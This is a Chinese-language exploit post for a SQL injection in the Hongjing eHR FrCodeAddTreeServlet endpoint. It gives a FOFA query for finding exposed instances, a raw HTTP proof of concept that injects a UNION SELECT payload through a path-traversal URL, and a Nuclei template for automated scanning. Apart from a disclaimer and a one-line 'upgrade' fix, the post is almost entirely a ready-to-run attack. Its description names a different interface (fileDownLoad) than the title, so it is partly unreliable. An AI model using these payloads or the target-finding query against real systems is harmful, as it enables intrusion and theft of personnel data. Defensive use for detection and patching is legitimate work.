宏景eHR FrCodeAddTreeServlet SQL注入漏洞

免责声明:文章来源互联网收集整理,请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

Ⅰ、漏洞描述

宏景eHR人力资源管理软件是一款人力资源管理与数字化应用相融合,满足动态化、协同化、流程化、战略化需求的软件。

宏景eHR fileDownLoad 接口处存在SQL注入漏洞,恶意攻击者可能会利用此漏洞执行任意SQL指令,导致敏感数据泄露,从而造成危害。

Ⅱ、fofa语句

app="HJSOFT-HCM"

Ⅲ、漏洞复现

POC

POST /templates/attestation/../../servlet/FrCodeAddTreeServlet HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
 
params=&issuperuser=&parentid=&privType=&manageprive=&action=&target=&showType=1%27+UNION+ALL+SELECT+%40%40version%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--+&treetype=&orgtype=

1、构建poc

宏景eHR FrCodeAddTreeServlet SQL注入漏洞_第1张图片

Ⅳ、Nuclei-POC

id: HJSOFT-FrCodeAddTreeServlet-SQL

info:
  name: 宏景FrCodeAddTreeServlet SQL注入
  author: WLF
  severity: high
  tags: HJSOFT
  description:
variables:
  file_name: "{{to_lower(rand_text_alpha(8))}}"
  file_content: "{{to_lower(rand_text_alpha(26))}}"
requests:
  - raw:
      - |
        POST /templates/attestation/../../servlet/FrCodeAddTreeServlet HTTP/1.1
        Host:{{Hostname}}
        User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
        Accept: */*
        Accept-Encoding: gzip, deflate
        Connection: keep-alive
        Content-Type: application/x-www-form-urlencoded
        
        params=&issuperuser=&parentid=&privType=&manageprive=&action=&target=&showType=1%27+UNION+ALL+SELECT+%40%40version%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--+&treetype=&orgtype=
              



    matchers:
      - type: dsl
        dsl:
          - status_code==200 && contains_all(body,"SQL","TreeNode")

宏景eHR FrCodeAddTreeServlet SQL注入漏洞_第2张图片

Ⅴ、修复建议

升级至安全版本

你可能感兴趣的:(安全)